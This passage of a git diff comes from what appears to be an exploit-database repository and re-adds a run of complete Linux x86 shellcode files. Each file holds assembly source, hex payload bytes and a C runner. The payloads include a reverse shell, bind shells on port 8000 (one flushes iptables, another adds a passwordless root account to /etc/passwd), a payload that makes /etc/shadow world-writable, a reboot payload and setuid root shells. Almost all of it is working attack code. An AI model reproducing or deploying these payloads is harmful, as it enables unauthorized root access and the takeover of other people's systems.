mov ecx, esp + inc ebx + push byte 0x66 + pop eax + int 0x80 + + mov ebx, eax ;save file descriptor + + ;dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0) + push byte 0x02 + pop ecx + do_dup: + push byte 0x3f + pop eax + int 0x80 + loop do_dup + push byte 0x3f + pop eax + int 0x80 + + + ; execve ("/bin/sh", ["/bin/sh", "-i"], 0); + xor edx, edx + push edx + push 0x68732f6e + push 0x69622f2f + mov ebx, esp + push edx + push word 0x692d + mov ecx, esp + push edx + push ecx + push ebx + mov ecx, esp + push byte 0x0b + pop eax + int 0x80 + + ;exit(0) + push byte 0x01 + pop eax + xor ebx, ebx + int 0x80 +-------------------------------------------------------------------- +*/ + +#include +#include + + + +char code[] = +"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" +"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" +"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" +"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" +"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" +"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" +"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" +"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" +"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" +"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" +"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" +"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" +"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" +"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" +"\xd3\x9e"; + + + +int main(void) +{ + printf("length: %d\n", strlen(code)); + + void (*shellcode)(); + shellcode = (void *)code; + shellcode(); + return (0); + +} + // milw0rm.com [2009-07-10] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13314.c b/platforms/lin_x86/shellcode/13314.c index 8bcc8d512..10e78c58d 100755 --- a/platforms/lin_x86/shellcode/13314.c +++ b/platforms/lin_x86/shellcode/13314.c @@ -1,33 +1,33 @@ -/* - * Title : reboot() polymorphic shellcode - 57 bytes - * Os: Linux x86 - * - * Author: Jonathan Salwan - submit AT shell-storm.org - * Web: http://www.shell-storm.org - * - * - * !! Database of shellcodes => http://www.shell-storm.org/shellcode/ - * - */ - -#include - -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" - "\x6c\x0e\xff\x01\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x32\xc1\x51\x69\x63\x70\x70\x75" - "\x69\x6f\x30\x73\x66\x69\x30\x74" - "\x63\x6a\x8a\xe4\x51\x8a\xe3\x54" - "\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce" - "\x81"; - - -int main() -{ - fprintf(stdout,"Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - -return 0; -} - +/* + * Title : reboot() polymorphic shellcode - 57 bytes + * Os: Linux x86 + * + * Author: Jonathan Salwan - submit AT shell-storm.org + * Web: http://www.shell-storm.org + * + * + * !! Database of shellcodes => http://www.shell-storm.org/shellcode/ + * + */ + +#include + +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" + "\x6c\x0e\xff\x01\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x32\xc1\x51\x69\x63\x70\x70\x75" + "\x69\x6f\x30\x73\x66\x69\x30\x74" + "\x63\x6a\x8a\xe4\x51\x8a\xe3\x54" + "\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce" + "\x81"; + + +int main() +{ + fprintf(stdout,"Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + +return 0; +} + // milw0rm.com [2009-06-29] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13315.c b/platforms/lin_x86/shellcode/13315.c index 12ce0c757..8a9260a58 100755 --- a/platforms/lin_x86/shellcode/13315.c +++ b/platforms/lin_x86/shellcode/13315.c @@ -1,58 +1,58 @@ -/* -Title : Linux/x86 - Shellcode Polymorphic chmod("/etc/shadow",666) & exit() - 54 bytes -Encode : _ADD - -Author : Jonathan Salwan -Mail : submit [!] shell-storm.org - - -! Database of shellcodes => http://www.shell-storm.org/shellcode/ - - -Informations _chmod() & _exit(): -================================ - - %eax = 15 - %ebx = /etc/shadow - %ecx = 666 - - %eax = 1 - %ebx = 0 - -Disassembly of section .text: - - 08048054 <.text>: - 8048054: 51 push %ecx - 8048055: 66 b9 b6 01 mov $0x1b6,%cx - 8048059: 68 61 64 6f 77 push $0x776f6461 - 804805e: 68 63 2f 73 68 push $0x68732f63 - 8048063: 68 2f 2f 65 74 push $0x74652f2f - 8048068: 89 e3 mov %esp,%ebx - 804806a: 6a 0f push $0xf - 804806c: 58 pop %eax - 804806d: cd 80 int $0x80 - 804806f: 40 inc %eax - 8048070: cd 80 int $0x80 - -*/ - - -#include "stdio.h" - -char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" - "\x6c\x0e\xff\x23\x80\xe9\x01\x75" - "\xf6\xeb\x05\xe8\xea\xff\xff\xff" - "\x74\x89\xdc\xd9\x24\x8b\x84\x87" - "\x92\x9a\x8b\x86\x52\x96\x8b\x8b" - "\x52\x52\x88\x97\xac\x06\x8d\x32" - "\x7b\xf0\xa3\x63\xf0\xa3"; - -int main() -{ - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); - - return 0; -} - +/* +Title : Linux/x86 - Shellcode Polymorphic chmod("/etc/shadow",666) & exit() - 54 bytes +Encode : _ADD + +Author : Jonathan Salwan +Mail : submit [!] shell-storm.org + + +! Database of shellcodes => http://www.shell-storm.org/shellcode/ + + +Informations _chmod() & _exit(): +================================ + + %eax = 15 + %ebx = /etc/shadow + %ecx = 666 + + %eax = 1 + %ebx = 0 + +Disassembly of section .text: + + 08048054 <.text>: + 8048054: 51 push %ecx + 8048055: 66 b9 b6 01 mov $0x1b6,%cx + 8048059: 68 61 64 6f 77 push $0x776f6461 + 804805e: 68 63 2f 73 68 push $0x68732f63 + 8048063: 68 2f 2f 65 74 push $0x74652f2f + 8048068: 89 e3 mov %esp,%ebx + 804806a: 6a 0f push $0xf + 804806c: 58 pop %eax + 804806d: cd 80 int $0x80 + 804806f: 40 inc %eax + 8048070: cd 80 int $0x80 + +*/ + + +#include "stdio.h" + +char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80" + "\x6c\x0e\xff\x23\x80\xe9\x01\x75" + "\xf6\xeb\x05\xe8\xea\xff\xff\xff" + "\x74\x89\xdc\xd9\x24\x8b\x84\x87" + "\x92\x9a\x8b\x86\x52\x96\x8b\x8b" + "\x52\x52\x88\x97\xac\x06\x8d\x32" + "\x7b\xf0\xa3\x63\xf0\xa3"; + +int main() +{ + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-06-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13316.c b/platforms/lin_x86/shellcode/13316.c index bb8135d47..86a6442f4 100755 --- a/platforms/lin_x86/shellcode/13316.c +++ b/platforms/lin_x86/shellcode/13316.c @@ -1,35 +1,35 @@ -/* - * - * linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode - * - * blue9057 root@blue9057.com - * - * / -int main() -{ - char shellcode[]="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" - "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68" - "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"; - //setreuid(geteuid(),geteuid()); - //execve("/bin/sh",0,0); - __asm__("" - "push $0x31;" - "pop %eax;" - "cltd;" - "int $0x80;" // geteuid(); - "mov %eax, %ebx;" - "mov %eax, %ecx;" - "push $0x46;" // setreuid(geteuid(),geteuid()); - "pop %eax;" - "int $0x80;" - "mov $0xb, %al;" - "push %edx;" - "push $0x68732f6e;" - "push $0x69622f2f;" - "mov %esp, %ebx;" - "mov %edx, %ecx;" - "int $0x80;" // execve("/bin/sh",0,0); - ""); -} - +/* + * + * linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34byte universal shellcode + * + * blue9057 root@blue9057.com + * + * / +int main() +{ + char shellcode[]="\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46" + "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68" + "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"; + //setreuid(geteuid(),geteuid()); + //execve("/bin/sh",0,0); + __asm__("" + "push $0x31;" + "pop %eax;" + "cltd;" + "int $0x80;" // geteuid(); + "mov %eax, %ebx;" + "mov %eax, %ecx;" + "push $0x46;" // setreuid(geteuid(),geteuid()); + "pop %eax;" + "int $0x80;" + "mov $0xb, %al;" + "push %edx;" + "push $0x68732f6e;" + "push $0x69622f2f;" + "mov %esp, %ebx;" + "mov %edx, %ecx;" + "int $0x80;" // execve("/bin/sh",0,0); + ""); +} + // milw0rm.com [2009-06-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13317.s b/platforms/lin_x86/shellcode/13317.s index 7ef148b22..04aa446a3 100755 --- a/platforms/lin_x86/shellcode/13317.s +++ b/platforms/lin_x86/shellcode/13317.s @@ -1,114 +1,114 @@ -; -; Title : Bindport TCP/8000 & execve iptables -F -; os : Linux x86 -; size : 176 bytes -; IP : localhost -; Port : 8000 -; Use : nc localhost 8000 -; -; Author : Jonathan Salwan -; Mail : submit AT shell-storm.org -; Web : http://www.shell-storm.org -; -; -; More shellcodes in => http://www.shell-storm.org/shellcode/ -; - -section .text -global _start - -_start: -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x1 -push byte 0x2 - -mov eax, 0x66 -mov ebx, 0x1 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push byte 0x0 -push word 0x401f -push word 0x2 -mov ebx, esp - -push byte 0x10 -push ebx -push edx - -mov eax, 0x66 -mov ebx, 0x2 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; -push byte 0x1 -push edx - -mov eax, 0x66 -mov ebx, 0x4 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push edx - -mov eax, 0x66 -mov ebx, 0x5 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; -mov eax, 0x3f -mov ebx, edx -mov ebx, 0x2 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x1 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; - - -;; execve(/sbin/iptables", "-F", NULL) -;; By Kris Katterjohn - -push byte 11 -pop eax -cdq -push edx -push word 0x462d -mov ecx, esp -push edx -push word 0x7365 -push 0x6c626174 -push 0x70692f6e -push 0x6962732f -mov ebx, esp -push edx -push ecx -push ebx -mov ecx, esp -int 0x80 - +; +; Title : Bindport TCP/8000 & execve iptables -F +; os : Linux x86 +; size : 176 bytes +; IP : localhost +; Port : 8000 +; Use : nc localhost 8000 +; +; Author : Jonathan Salwan +; Mail : submit AT shell-storm.org +; Web : http://www.shell-storm.org +; +; +; More shellcodes in => http://www.shell-storm.org/shellcode/ +; + +section .text +global _start + +_start: +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x1 +push byte 0x2 + +mov eax, 0x66 +mov ebx, 0x1 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push byte 0x0 +push word 0x401f +push word 0x2 +mov ebx, esp + +push byte 0x10 +push ebx +push edx + +mov eax, 0x66 +mov ebx, 0x2 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; +push byte 0x1 +push edx + +mov eax, 0x66 +mov ebx, 0x4 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push edx + +mov eax, 0x66 +mov ebx, 0x5 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; +mov eax, 0x3f +mov ebx, edx +mov ebx, 0x2 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x1 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; + + +;; execve(/sbin/iptables", "-F", NULL) +;; By Kris Katterjohn + +push byte 11 +pop eax +cdq +push edx +push word 0x462d +mov ecx, esp +push edx +push word 0x7365 +push 0x6c626174 +push 0x70692f6e +push 0x6962732f +mov ebx, esp +push edx +push ecx +push ebx +mov ecx, esp +int 0x80 + ; milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13318.s b/platforms/lin_x86/shellcode/13318.s index 1bba36998..2339b5743 100755 --- a/platforms/lin_x86/shellcode/13318.s +++ b/platforms/lin_x86/shellcode/13318.s @@ -1,137 +1,137 @@ -; -; Title : Bindport TCP/8000 & execve add user with access root -; os : Linux x86 -; size : 225+ bytes -; IP : localhost -; Port : 8000 -; Use : nc localhost 8000 -; -; Author : Jonathan Salwan -; Mail : submit AT shell-storm.org -; Web : http://www.shell-storm.org -; -; -; More shellcodes in => http://www.shell-storm.org/shellcode/ -; - -section .text -global _start - -_start: -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x1 -push byte 0x2 - -mov eax, 0x66 -mov ebx, 0x1 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push byte 0x0 -push word 0x401f -push word 0x2 -mov ebx, esp - -push byte 0x10 -push ebx -push edx - -mov eax, 0x66 -mov ebx, 0x2 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; -push byte 0x1 -push edx - -mov eax, 0x66 -mov ebx, 0x4 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push edx - -mov eax, 0x66 -mov ebx, 0x5 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; -mov eax, 0x3f -mov ebx, edx -mov ebx, 0x2 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x1 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; -push byte 0x05 -pop eax -xor ecx, ecx -push ecx -push 0x64777373 -push 0x61702f2f -push 0x6374652f -mov ebx, esp -mov cx, 02001Q -int 0x80 -;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; - -mov ebx, eax - -;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; -push byte 0x04 -pop eax -xor edx, edx -push edx - -push word 0x6873 -push 0x61622f6e -push 0x69622f3a -push 0x746f6f72 -push 0x2f3a746f -push 0x6f723a30 -push 0x3a303a3a -push 0x74303072 -mov ecx, esp -push byte 0x1f -pop edx -int 0x80 -;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; -push byte 0x06 -pop eax -int 0x80 -;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; - -push byte 0x01 -pop eax -int 0x80 - +; +; Title : Bindport TCP/8000 & execve add user with access root +; os : Linux x86 +; size : 225+ bytes +; IP : localhost +; Port : 8000 +; Use : nc localhost 8000 +; +; Author : Jonathan Salwan +; Mail : submit AT shell-storm.org +; Web : http://www.shell-storm.org +; +; +; More shellcodes in => http://www.shell-storm.org/shellcode/ +; + +section .text +global _start + +_start: +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x1 +push byte 0x2 + +mov eax, 0x66 +mov ebx, 0x1 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push byte 0x0 +push word 0x401f +push word 0x2 +mov ebx, esp + +push byte 0x10 +push ebx +push edx + +mov eax, 0x66 +mov ebx, 0x2 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; +push byte 0x1 +push edx + +mov eax, 0x66 +mov ebx, 0x4 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push edx + +mov eax, 0x66 +mov ebx, 0x5 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; +mov eax, 0x3f +mov ebx, edx +mov ebx, 0x2 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x1 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; +push byte 0x05 +pop eax +xor ecx, ecx +push ecx +push 0x64777373 +push 0x61702f2f +push 0x6374652f +mov ebx, esp +mov cx, 02001Q +int 0x80 +;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;; + +mov ebx, eax + +;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; +push byte 0x04 +pop eax +xor edx, edx +push edx + +push word 0x6873 +push 0x61622f6e +push 0x69622f3a +push 0x746f6f72 +push 0x2f3a746f +push 0x6f723a30 +push 0x3a303a3a +push 0x74303072 +mov ecx, esp +push byte 0x1f +pop edx +int 0x80 +;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; +push byte 0x06 +pop eax +int 0x80 +;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;; + +push byte 0x01 +pop eax +int 0x80 + ; milw0rm.com [2009-06-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13319.s b/platforms/lin_x86/shellcode/13319.s index 65ba0f01b..60f4fd419 100755 --- a/platforms/lin_x86/shellcode/13319.s +++ b/platforms/lin_x86/shellcode/13319.s @@ -1,108 +1,108 @@ -; -; Title : Bind asm code Linux x86 - 179 bytes -; IP : 0.0.0.0 -; Port : 8000 -; -; -; Use : nc localhost 8000 -; id -; uid=0(root) gid=0(root) groupes=0(root) -; -; -; Author : Jonathan Salwan -; Mail : submit AT shell-storm.org -; Web : http://www.shell-storm.org -; -; -; More shellcodes in => http://www.shell-storm.org/shellcode/ -; - - -section .data -name db '/bin/sh', 0 -section .text -global _start - -_start: -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x1 -push byte 0x2 - -mov eax, 0x66 -mov ebx, 0x1 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push byte 0x0 -push word 0x401f -push word 0x2 -mov ebx, esp - -push byte 0x10 -push ebx -push edx - -mov eax, 0x66 -mov ebx, 0x2 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; -push byte 0x1 -push edx - -mov eax, 0x66 -mov ebx, 0x4 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; -push byte 0x0 -push byte 0x0 -push edx - -mov eax, 0x66 -mov ebx, 0x5 -mov ecx, esp -int 0x80 -;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; - -mov edx, eax - -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; -mov eax, 0x3f -mov ebx, edx -mov ebx, 0x2 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x1 -int 0x80 - -mov eax, 0x3f -mov ebx, edx -mov ecx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; - -;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; -mov al, 0x0b -mov ebx, name -push byte 0x0 -push name -mov ecx, esp -mov edx, 0x0 -int 0x80 -;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; - +; +; Title : Bind asm code Linux x86 - 179 bytes +; IP : 0.0.0.0 +; Port : 8000 +; +; +; Use : nc localhost 8000 +; id +; uid=0(root) gid=0(root) groupes=0(root) +; +; +; Author : Jonathan Salwan +; Mail : submit AT shell-storm.org +; Web : http://www.shell-storm.org +; +; +; More shellcodes in => http://www.shell-storm.org/shellcode/ +; + + +section .data +name db '/bin/sh', 0 +section .text +global _start + +_start: +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x1 +push byte 0x2 + +mov eax, 0x66 +mov ebx, 0x1 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push byte 0x0 +push word 0x401f +push word 0x2 +mov ebx, esp + +push byte 0x10 +push ebx +push edx + +mov eax, 0x66 +mov ebx, 0x2 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; +push byte 0x1 +push edx + +mov eax, 0x66 +mov ebx, 0x4 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; +push byte 0x0 +push byte 0x0 +push edx + +mov eax, 0x66 +mov ebx, 0x5 +mov ecx, esp +int 0x80 +;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;; + +mov edx, eax + +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; +mov eax, 0x3f +mov ebx, edx +mov ebx, 0x2 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x1 +int 0x80 + +mov eax, 0x3f +mov ebx, edx +mov ecx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;; + +;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; +mov al, 0x0b +mov ebx, name +push byte 0x0 +push name +mov ecx, esp +mov edx, 0x0 +int 0x80 +;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;; + ; milw0rm.com [2009-06-01] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13320.c b/platforms/lin_x86/shellcode/13320.c index 03f7aaf26..035b80e29 100755 --- a/platforms/lin_x86/shellcode/13320.c +++ b/platforms/lin_x86/shellcode/13320.c @@ -1,40 +1,40 @@ -/* -setuid(0) + execve(/bin/sh) - just 4 fun. -xi4oyu [at] 80sec.com - -main(){ -__asm( "xorq %rdi,%rdi\n\t" - "mov $0x69,%al\n\t" - "syscall \n\t" - "xorq %rdx, %rdx \n\t" - "movq $0x68732f6e69622fff,%rbx; \n\t" - "shr $0x8, %rbx; \n\t" - "push %rbx; \n\t" - "movq %rsp,%rdi; \n\t" - "xorq %rax,%rax; \n\t" - "pushq %rax; \n\t" - "pushq %rdi; \n\t" - "movq %rsp,%rsi; \n\t" - "mov $0x3b,%al; \n\t" - "syscall ; \n\t" - "pushq $0x1 ; \n\t" - "pop %rdi ; \n\t" - "pushq $0x3c ; \n\t" - "pop %rax ; \n\t" - "syscall ; \n\t" -); -} -*/ -main() { - char shellcode[] = - "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" - "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" - "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" - "\x58\x0f\x05"; - (*(void (*)()) shellcode)(); -} - -2009-05-14 -evil.xi4oyu - +/* +setuid(0) + execve(/bin/sh) - just 4 fun. +xi4oyu [at] 80sec.com + +main(){ +__asm( "xorq %rdi,%rdi\n\t" + "mov $0x69,%al\n\t" + "syscall \n\t" + "xorq %rdx, %rdx \n\t" + "movq $0x68732f6e69622fff,%rbx; \n\t" + "shr $0x8, %rbx; \n\t" + "push %rbx; \n\t" + "movq %rsp,%rdi; \n\t" + "xorq %rax,%rax; \n\t" + "pushq %rax; \n\t" + "pushq %rdi; \n\t" + "movq %rsp,%rsi; \n\t" + "mov $0x3b,%al; \n\t" + "syscall ; \n\t" + "pushq $0x1 ; \n\t" + "pop %rdi ; \n\t" + "pushq $0x3c ; \n\t" + "pop %rax ; \n\t" + "syscall ; \n\t" +); +} +*/ +main() { + char shellcode[] = + "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62" + "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31" + "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c" + "\x58\x0f\x05"; + (*(void (*)()) shellcode)(); +} + +2009-05-14 +evil.xi4oyu + // milw0rm.com [2009-05-14] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13321.c b/platforms/lin_x86/shellcode/13321.c index 6816d05dd..5b6d9d09d 100755 --- a/platforms/lin_x86/shellcode/13321.c +++ b/platforms/lin_x86/shellcode/13321.c @@ -1,92 +1,92 @@ -/* -General: - Serial port shell binding, busybox launching shellcode.. yey! - -Specific: - *really* wish i could tell you what i needed this for.. but meh.. - - this will bind a busybox sh shell to /dev/ttyS0, the shellcode -does not alter the baudrate settings.. 9600 is the default, but its easy enough to cycle though if were -at a different baud rate. - - -...damn how long has it been since i posted one of these? - -happy hunting - - --phar - @ - stonedcoder -mdavis . - @ org - ioactive - . - com - -main: - 31 d2 xor %edx,%edx - 31 c0 xor %eax,%eax - 6a 02 push $0x2 #flags O_RDW - 59 pop %ecx - 66 b8 53 